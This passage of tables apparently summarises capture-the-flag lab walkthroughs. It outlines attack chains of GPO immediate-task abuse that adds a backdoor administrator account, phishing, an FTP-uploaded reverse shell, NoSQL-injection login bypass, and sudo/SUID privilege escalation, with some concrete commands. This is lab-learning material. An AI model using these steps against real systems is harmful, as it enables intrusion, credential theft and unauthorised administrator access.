8	GPO Abuse	Creating and applying immediate tasks	`New-GPOImmediateTask -TaskName gop12i -GPODisplayName "Test GPO" -CommandArguments 'net user gopikrishna Ramco@12345 /add' -force` `New-GPOImmediateTask -TaskName gopi131 -GPODisplayName "Test GPO" -CommandArguments 'net localgroup Administrators gopikrishna /add' -force`
9	File Permissions	Modifying permissions for `flag.txt`	`icacls flag.txt /grant administrators:F`
10	Flag Retrieval	Retrieving the flag	Flag is `RASTA{6p0_4bu53_15_h4rdc0r3}`

ID	Stage	Techniques	Commands
1	Initial Recon	Nmap scan	`nmap -sC -sV 10.10.10.197`
2	DNS Enumeration	Brute-force subdomains	`ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://sneakycorp.htb/ -H "Host: FUZZ.sneakycorp.htb" -fs 185`
3	Email Gathering	Extract emails	Extract emails from `http://sneakycorp.htb/team.php` to `mails.txt`
4	Phishing	Send phishing emails	Use `swaks` to send emails to addresses in `mails.txt`
5	Credential Harvesting	Decode credentials	Use Burp Suite to decode credentials from intercepted traffic
6	Email Client Setup	Configure email client	Set up `evolution` with SMTP server and `[email protected]` credentials
7	FTP Access	Access FTP	`ftp 10.10.10.197` with credentials obtained
8	Reverse Shell	Upload and trigger reverse shell	Upload `rev.php` via FTP and trigger with `curl`
9	Privilege Escalation	Add SSH key to authorized keys	Add generated SSH key to `/home/low/.ssh/authorized_keys` via malicious package
10	Sudo Exploitation	Exploit sudo permissions	Use `sudo /usr/bin/pip3` to execute a malicious package with a reverse shell

ID	Stage	Techniques	Commands
1	Port Scanning	Masscan and Nmap	`masscan -p1-65535,U:1-65535 10.10.10.162 --rate=1000 -e tun0` `nmap [options] [target]`
2	Web Enumeration	Checking web ports	Access web service on ports 80 and 443
3	SSL Certificate	Viewing certificate	View SSL certificate details
4	Host File Editing	Adding VHOST to hosts file	Edit `/etc/hosts` to add `staging-order.mango.htb`
5	NoSQL Injection	Bypassing login	Use Burp Suite to intercept and modify request for NoSQL injection
6	Data Extraction	Automating credential extraction	Run Python script to extract credentials for `admin` and `mango` users
7	SSH Connection	Accessing SSH	SSH into the server using extracted credentials
8	User Flag Access	Retrieving user flag	Use `su` to login as `admin` and retrieve user flag
9	Privilege Escalation	Exploiting SUID file	Use SUID file to read root flag or exploit for root access
10	Root Flag Access	Reading root flag	Run binary or use `jjs` to read root flag